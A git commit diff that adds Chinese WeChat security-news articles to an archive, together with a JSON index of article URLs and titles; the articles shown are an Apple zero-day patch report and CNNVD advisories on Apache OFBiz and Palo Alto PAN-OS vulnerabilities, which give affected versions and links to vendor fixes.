补丁不给力,VMware vCenter 严重RCE漏洞遭利用、Apple 发布紧急更新以修补被积极利用的零日漏洞、苹果确认针对 macOS 系统的零日漏洞攻击、vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具、紫光档案管理系统 mergeFile SQL注入漏洞、【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击、一文读懂SSRF漏洞、DataCon晚自习 | 浅谈大模型辅助漏洞挖掘、CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害、命令执行漏洞基础、【成功复现】D-Link NAS远程命令执行漏洞(Cookie)、CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报、CNNVD | 关于Apache OFBiz安全漏洞的通报、中间件常见漏洞总结、苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞、奇安信集团获2024年世界互联网大会杰出贡献奖、第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示、一名优秀CISO的自述:是什么成就了我?、几个常见的越权漏洞挖掘案例、【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞、CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报、CNNVD关于Apache OFBiz安全漏洞的通报、信息安全漏洞周报(2024年第47期)、Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的、【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)、【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524)、taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)、平板锅(Palo Alto)防火墙0day 漏洞分析及Exp、美国饮用水系统存在300多个漏洞,影响1.1亿人、【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)、一次黑盒转变白盒前台漏洞审计过程、全球数据跨境流动合作倡议、美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览、

This commit is contained in:
test 2024-11-20 12:21:38 +00:00
parent 779ac2f2e7
commit 3bbe9e8b00
33 changed files with 4081 additions and 47 deletions

View File

@ -256,5 +256,38 @@
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞", "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统资管云存在前台文件上传漏洞", "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统资管云存在前台文件上传漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502450&idx=1&sn=a1fc8665dfbb9c1703fef3c40ff25310&chksm=fe79eeeac90e67fcbf34eede7835db3aa9916a7a50c559be8c34d0446433f0f4d41189eb8b1a&scene=58&subscene=0": "【在野利用】Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)安全风险通告", "https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502450&idx=1&sn=a1fc8665dfbb9c1703fef3c40ff25310&chksm=fe79eeeac90e67fcbf34eede7835db3aa9916a7a50c559be8c34d0446433f0f4d41189eb8b1a&scene=58&subscene=0": "【在野利用】Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)安全风险通告",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)" "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)",
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521523&idx=1&sn=286f99df03f25ebd1cb1fb497f991b21&chksm=ea94a599dde32c8fb84c9a7247de810f5f23bf5c0c99f55a79ff59780dc42aa54f886a151327&scene=58&subscene=0": "补丁不给力VMware vCenter 严重RCE漏洞遭利用",
"https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247489994&idx=1&sn=7814bfad57686190c7bac0bc2903102f": "Apple 发布紧急更新以修补被积极利用的零日漏洞",
"https://mp.weixin.qq.com/s?__biz=MzA5NzQxMTczNA==&mid=2649166849&idx=3&sn=7d17b619580e9f94e8465b600d569241": "苹果确认针对 macOS 系统的零日漏洞攻击",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307561&idx=4&sn=4bfa46d48f4a7ec2bcdeb281d95354f8": "vulnhuntr基于大语言模型和静态代码分析的漏洞扫描与分析工具",
"https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487940&idx=1&sn=77723ded4c817fa7df978074334ee981": "紫光档案管理系统 mergeFile SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066097&idx=3&sn=0e0cc754f2cdc596b5f8419a8fa6f7a5": "【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击",
"https://mp.weixin.qq.com/s?__biz=Mzk0NTY5Nzc1OA==&mid=2247484133&idx=1&sn=52effc09cdcd03efa6380224aa30ad9c": "一文读懂SSRF漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU5Njg1NzMyNw==&mid=2247488664&idx=2&sn=3e7b7e7edab1dffabf0816e27d18da3b": "DataCon晚自习 | 浅谈大模型辅助漏洞挖掘",
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247524380&idx=3&sn=f9182149d88336b1242adda5aef422d1": "CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害",
"https://mp.weixin.qq.com/s?__biz=Mzg4MDY1MzUzNw==&mid=2247497938&idx=2&sn=8d13015033c4c8514aac0c0c5375b9df": "命令执行漏洞基础",
"https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247502616&idx=1&sn=58bb44c2b1e5b68a5db14bccb1baca21": "【成功复现】D-Link NAS远程命令执行漏洞Cookie",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=4&sn=263ea32ebfc468c8a503fd8a7d847988": "CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=5&sn=9950f25047c9a9cdb95f448751bcd9de": "CNNVD | 关于Apache OFBiz安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247522987&idx=1&sn=563d193cf4b9a511831b8769974d8266": "中间件常见漏洞总结",
"https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458583542&idx=2&sn=5be0221a6d9dac5a2b8d75ede77e159b": "苹果紧急发布安全更新修复影响英特尔Mac的两个零日漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247622153&idx=1&sn=bdaf7d21183b302a2b5c4dcc98808c26": "奇安信集团获2024年世界互联网大会杰出贡献奖",
"https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484351&idx=1&sn=f9ffabcc9b25602a911778f2121e66fa": "第十三期 · 安钥®「漏洞处置标准作业程序SOP」征文启示",
"https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247631812&idx=1&sn=cb58ca9f66ae638242515b34d3fee572": "一名优秀CISO的自述是什么成就了我?",
"https://mp.weixin.qq.com/s?__biz=MzkzODUzMjA1MQ==&mid=2247484575&idx=1&sn=abd69fc656d121c2d04f7988fa8a2bee": "几个常见的越权漏洞挖掘案例",
"https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247492658&idx=1&sn=57ec9a56c1b1cde21b51a26712d252a8": "【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞",
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=1&sn=c2d1b09182648cd2ba67f4f305a63865": "CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=2&sn=28601f77d7e3146b42cd9e063a788509": "CNNVD关于Apache OFBiz安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=3&sn=dd3fcba72938894feeccabe050dc7c05": "信息安全漏洞周报2024年第47期",
"https://mp.weixin.qq.com/s?__biz=MzA3NTIyNzgwNA==&mid=2650259511&idx=1&sn=209eedf6288443cf581e203cfc45284c": "Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的",
"https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=2&sn=45c5ee1cc7cae505fcdfb13d0c6b1050": "【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞CVE-2024-21287",
"https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=3&sn=2a266e4509b9d0fb089ce92749c6f7ca": "【漏洞通告】Wget服务器端请求伪造漏洞CVE-2024-10524",
"https://mp.weixin.qq.com/s?__biz=MzkxODI4NDg3Nw==&mid=2247484726&idx=1&sn=591227dcdebf57686a3a4c2f953505eb": "taocms 3.0.1 本地文件泄露漏洞CVE-2021-44983",
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492578&idx=2&sn=fa464eb54666d60dabd0a65ccbaeac63": "平板锅(Palo Alto)防火墙0day 漏洞分析及Exp",
"https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650603759&idx=2&sn=986d8ed76f6fd390e46b43c2cec2df92": "美国饮用水系统存在300多个漏洞影响1.1亿人",
"https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650989812&idx=1&sn=fd1211672ea7e1d7357c9909c7600faa": "【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞CVE-2024-0012 和 CVE-2024-9474",
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486083&idx=1&sn=eb8dc60a736b80cc2bcd90bc76f825b3": "一次黑盒转变白盒前台漏洞审计过程",
"https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649400795&idx=1&sn=99b65e43e266182fd962e758b293c138": "全球数据跨境流动合作倡议",
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133464&idx=2&sn=16e48bc09bde1b9e2e0b383257d60d2a": "美国国会图书馆邮件系统遭攻击近9个月通信内容或泄露ChatGPT沙箱环境存多个严重安全隐患仅20%漏洞被修复 | 牛览"
} }

View File

@ -0,0 +1,169 @@
# Apple 发布紧急更新以修补被积极利用的零日漏洞
信息安全大事件 2024-11-20 11:55
Apple
发布了适用于
iOS
iPadOS
macOS
visionOS
及其
Safari Web
浏览器的安全更新,以解决在野外被积极利用的两个零日漏洞。
缺陷如下所列 :
- CVE-2024-44308- JavaScriptCore
中的一个漏洞,在处理恶意
Web
内容时可能导致任意代码执行
- CVE-2024-44309- WebKit
中的一个
Cookie
管理漏洞,在处理恶意
Web
内容时可能导致跨站点脚本
XSS
攻击
这家 iPhone
制造商表示,它分别通过改进检查和改进状态管理解决了
CVE-2024-44308
CVE-2024-44309
关于利用的确切性质知之甚少,但 Apple
承认这两个漏洞
可能已在基于
Intel
Mac
系统上被积极利用
Google
威胁分析小组
TAG
Clément Lecigne
Benoît Sevens
因发现并报告这两个漏洞而受到赞誉,这表明它们可能被用作高度针对性政府支持或雇佣兵间谍软件攻击的一部分。
这些更新适用于以下设备和操作系统 :
- iOS 18.1.1 和 iPadOS 18.1.1
 - iPhone XS
及更新机型、
iPad Pro 13
英寸、
iPad Pro 12.9
英寸(第
3
代及更新机型)、
iPad Pro 11
英寸(第
1
代及更新机型)、
iPad Air
3
代及更新机型、
iPad
7
代及更新机型、
iPad mini
5
代及更新机型
- iOS 17.7.2 和 iPadOS 17.7.2
 - iPhone XS
及更新机型、
iPad Pro 13
英寸、
iPad Pro 12.9
英寸(第
2
代及更新机型)、
iPad Pro 10.5
英寸、
iPad Pro 11
英寸(第
1
代及更新机型)、
iPad Air
3
代及更新机型、
iPad
6
代及更新机型、
iPad mini
5
代及更新机型
- macOS Sequoia 15.1.1
 -
运行
macOS Sequoia
Mac
- visionOS 2.1.1
 - Apple Vision Pro
- Safari 18.1.1
 -
运行
macOS Ventura
macOS Sonoma
Mac
到目前为止Apple
今年已经解决了其软件中的四个零日漏洞,其中包括一个
CVE-2024-27834
),该漏洞在 Pwn2Own
温哥华黑客竞赛中演示。其他三个版本已于 
2024
 
年 1 月
和 3
月修补。
建议用户尽快将设备更新到最新版本,以防范潜在威胁。
<table><tbody style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"><tr class="ue-table-interlace-color-single js_darkmode__6" data-style="-webkit-tap-highlight-color: transparent; outline: 0px; background-color: rgb(28, 28, 28); visibility: visible; color: rgb(205, 205, 205) !important;" style="-webkit-tap-highlight-color: transparent;outline: 0px;background-color: rgb(28, 28, 28);visibility: visible;color: rgb(205, 205, 205) !important;"><td width="557" valign="top" data-style="-webkit-tap-highlight-color: transparent; outline: 0px; word-break: break-all; hyphens: auto; border-color: rgb(76, 76, 76); background-color: rgb(255, 218, 169); visibility: visible; color: rgb(25, 25, 25) !important;" class="js_darkmode__7" style="-webkit-tap-highlight-color: transparent;outline: 0px;word-break: break-all;hyphens: auto;border-color: rgb(76, 76, 76);background-color: rgb(255, 218, 169);visibility: visible;color: rgb(25, 25, 25) !important;"><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;font-size: 12px;visibility: visible;color: rgb(0, 0, 0);">尊敬的读者:<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>感谢您花时间阅读我们提供的这篇文章。我们非常重视您的时间和精力,并深知信息对您的重要性。<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>我们希望了解您对这篇文章的看法和感受。我们真诚地想知道您是否认为这篇文章为您带来了有价值的资讯和启示,是否有助于您的个人或职业发展。<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>如果您认为这篇文章对您非常有价值,并且希望获得更多的相关资讯和服务,我们愿意为您提供进一步的定制化服务。请通过填写我们提供的在线表单,与我们联系并提供您的邮箱地址或其他联系方式。我们将定期向您发送相关资讯和更新,以帮助您更好地了解我们的服务和文章内容。</span></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;visibility: visible;"><br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;text-indent: 0em;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;color: rgb(0, 0, 0);">                   </span><img class="rich_pages wxw-img" data-backh="106" data-backw="106" data-cropselx1="0" data-cropselx2="119" data-cropsely1="0" data-cropsely2="119" data-galleryid="" data-imgfileid="100006343" data-ratio="1" data-s="300,640" data-type="png" data-w="1000" data-src="https://mmbiz.qpic.cn/sz_mmbiz_png/JqliagemfTA5N8G6ZVujodYTTD7NSaxFG5suXlkibicfoGRzCk6vHhCUBx7ST8b4AxdsFVNNAH4ltePBWX4AxKY0A/640?wx_fmt=other&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="-webkit-tap-highlight-color: transparent;outline: 0px;font-family: 宋体;font-size: 14px;letter-spacing: 0.578px;text-align: center;visibility: visible !important;width: 119px !important;"/></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;text-indent: 0em;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;font-family: 宋体;font-size: 12px;letter-spacing: 0.578px;text-align: center;color: rgb(0, 0, 0);">                               扫描二维码,参与调查</span></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;"><br style="-webkit-tap-highlight-color: transparent;outline: 0px;letter-spacing: 0.544px;"/></section></td></tr></tbody></table>
**END**
点击下方,关注公众号
获取免费咨询和安全服务
![](https://mmbiz.qpic.cn/mmbiz_png/JqliagemfTA5OxIlGh6IbpxrTJHkcY5DZ4O80nevX4Ev7IHvjZfPZDDMxibSVWk4IdYfaYpuhBgz2iaWS5tzXZLJw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
安全咨询/安全集成/安全运营
专业可信的信息安全应用服务商!
http://www.jsgjxx.com

View File

@ -0,0 +1,71 @@
# CNNVD | 关于Apache OFBiz安全漏洞的通报
中国信息安全 2024-11-20 10:12
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MBicjiae1FlDHspS1icKI5DPchRAiabVUjGwSYgL2zre1AC5ZSd8VdOvFYQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "")
**扫码订阅《中国信息安全》**
邮发代号 2-786
征订热线010-82341063
**漏洞情况**
近日国家信息安全漏洞库CNNVD收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前Apache官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。
## 一漏洞介绍
Apache OFBiz是美国阿帕奇Apache基金会的一套企业资源计划ERP系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造SSRF攻击导致远程代码执行。
## 二危害影响
Apache OFBiz 18.12.17以下版本受此漏洞影响。
## 三修复建议
目前Apache官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。官方下载链接如下
https://ofbiz.apache.org/download.html
本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代山东数据科技服务有限公司、安恒愿景成都信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。
CNNVD将继续跟踪上述漏洞的相关情况及时发布相关信息。如有需要可与CNNVD联系。
联系方式cnnvd@itsec.gov.cn
来源CNNVD
**分享网络安全知识 强化网络安全意识**
**欢迎关注《中国信息安全》杂志官方抖音号**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2M2F0GT7xiboynjVmCL5sOibaNp9GaEQxpA1KBZ2HZgaxXibOHG8Uz5ItDQ/640?wx_fmt=jpeg&from=appmsg "")
**《中国信息安全》杂志倾力推荐**
**“企业成长计划”**
**点击下图 了解详情**
[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect)

View File

@ -0,0 +1,69 @@
# CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报
中国信息安全 2024-11-20 10:12
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MBicjiae1FlDHspS1icKI5DPchRAiabVUjGwSYgL2zre1AC5ZSd8VdOvFYQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "")
**扫码订阅《中国信息安全》**
邮发代号 2-786
征订热线010-82341063
**漏洞情况**
近日国家信息安全漏洞库CNNVD收到关于Palo Alto Networks PAN-OS 安全漏洞CNNVD-202411-2328、CVE-2024-0012情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面进而获取管理员权限控制目标设备。PAN-OS多个版本均受此漏洞影响。目前Palo Alto Networks官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。
## 一漏洞介绍
Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞该漏洞源于设备存在身份验证绕过问题攻击者利用漏洞可以在未授权的情况下登录后台管理界面进而获取管理员权限控制目标设备。
## 二危害影响
PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。
## 三修复建议
目前Palo Alto Networks官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。官方参考链接
https://security.paloaltonetworks.com/CVE-2024-0012
本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术北京股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术上海有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技北京股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。
CNNVD将继续跟踪上述漏洞的相关情况及时发布相关信息。如有需要可与CNNVD联系。
联系方式cnnvd@itsec.gov.cn
来源CNNVD
**分享网络安全知识 强化网络安全意识**
**欢迎关注《中国信息安全》杂志官方抖音号**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2M2F0GT7xiboynjVmCL5sOibaNp9GaEQxpA1KBZ2HZgaxXibOHG8Uz5ItDQ/640?wx_fmt=jpeg&from=appmsg "")
**《中国信息安全》杂志倾力推荐**
**“企业成长计划”**
**点击下图 了解详情**
[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect)

View File

@ -0,0 +1,44 @@
# CNNVD关于Apache OFBiz安全漏洞的通报
原创 CNNVD CNNVD安全动态 2024-11-20 09:05
![](https://mmbiz.qpic.cn/mmbiz_gif/g1thw9Goocf2Ufz929a1thwAyKI8uIwUT7yfu4ibROBCthXslE23ia0ibWJVYlkxqulYy37zyiblBfrwib4m7erTkbQ/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/k5xJjBPo8ceEDyDtWwClGjzMFF89SzKxRwqsR5z89FRTn8YhflGDHd440FiafMOgcV0GYmiawnCH2GUGYcaciaG8g/640?&wx_fmt=gif "")
**点击蓝字 关注我们**
![](https://mmbiz.qpic.cn/mmbiz_gif/aqTr2WnSRI6o0t7BMQpMu5RC6OgKfSTia0iclOkC3ibiao2LBH88P7F9nDjxDzYq9Y9PicS0OlPseqmQqHfiaM4TVq1w/640?&wx_fmt=gif "")
**漏洞情况**
近日国家信息安全漏洞库CNNVD收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前Apache官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。
## 一漏洞介绍
Apache OFBiz是美国阿帕奇Apache基金会的一套企业资源计划ERP系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造SSRF攻击导致远程代码执行。
## 二危害影响
Apache OFBiz 18.12.17以下版本受此漏洞影响。
## 三修复建议
目前Apache官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。官方下载链接如下
https://ofbiz.apache.org/download.html
本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代山东数据科技服务有限公司、安恒愿景成都信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。
CNNVD将继续跟踪上述漏洞的相关情况及时发布相关信息。如有需要可与CNNVD联系。联系方式: cnnvd@itsec.gov.cn
![](https://mmbiz.qpic.cn/mmbiz_gif/tV4JDvMn6RMFN7ExSt7AEhx1DPNW68Bt8SXrAelC5L01auTNJkN19gJn8zP0hPAhSMHibfRNj70fV2aDD6u681Q/640?&wx_fmt=gif "")

View File

@ -0,0 +1,44 @@
# CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报
原创 CNNVD CNNVD安全动态 2024-11-20 09:05
![](https://mmbiz.qpic.cn/mmbiz_gif/g1thw9Goocf2Ufz929a1thwAyKI8uIwUT7yfu4ibROBCthXslE23ia0ibWJVYlkxqulYy37zyiblBfrwib4m7erTkbQ/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/k5xJjBPo8ceEDyDtWwClGjzMFF89SzKxRwqsR5z89FRTn8YhflGDHd440FiafMOgcV0GYmiawnCH2GUGYcaciaG8g/640? "")
**点击蓝字 关注我们**
![](https://mmbiz.qpic.cn/mmbiz_gif/aqTr2WnSRI6o0t7BMQpMu5RC6OgKfSTia0iclOkC3ibiao2LBH88P7F9nDjxDzYq9Y9PicS0OlPseqmQqHfiaM4TVq1w/640? "")
**漏洞情况**
近日国家信息安全漏洞库CNNVD收到关于Palo Alto Networks PAN-OS 安全漏洞CNNVD-202411-2328、CVE-2024-0012情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面进而获取管理员权限控制目标设备。PAN-OS多个版本均受此漏洞影响。目前Palo Alto Networks官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。
## 一漏洞介绍
Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞该漏洞源于设备存在身份验证绕过问题攻击者利用漏洞可以在未授权的情况下登录后台管理界面进而获取管理员权限控制目标设备。
## 二危害影响
PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。
## 三修复建议
目前Palo Alto Networks官方已发布新版本修复了该漏洞建议用户及时确认产品版本尽快采取修补措施。官方参考链接
https://security.paloaltonetworks.com/CVE-2024-0012
本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术北京股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术上海有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技北京股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。
CNNVD将继续跟踪上述漏洞的相关情况及时发布相关信息。如有需要可与CNNVD联系。联系方式:
cnnvd@itsec.gov.cn
![](https://mmbiz.qpic.cn/mmbiz_gif/tV4JDvMn6RMFN7ExSt7AEhx1DPNW68Bt8SXrAelC5L01auTNJkN19gJn8zP0hPAhSMHibfRNj70fV2aDD6u681Q/640? "")

View File

@ -0,0 +1,99 @@
# CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害
Ots安全 2024-11-20 10:39
![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "")
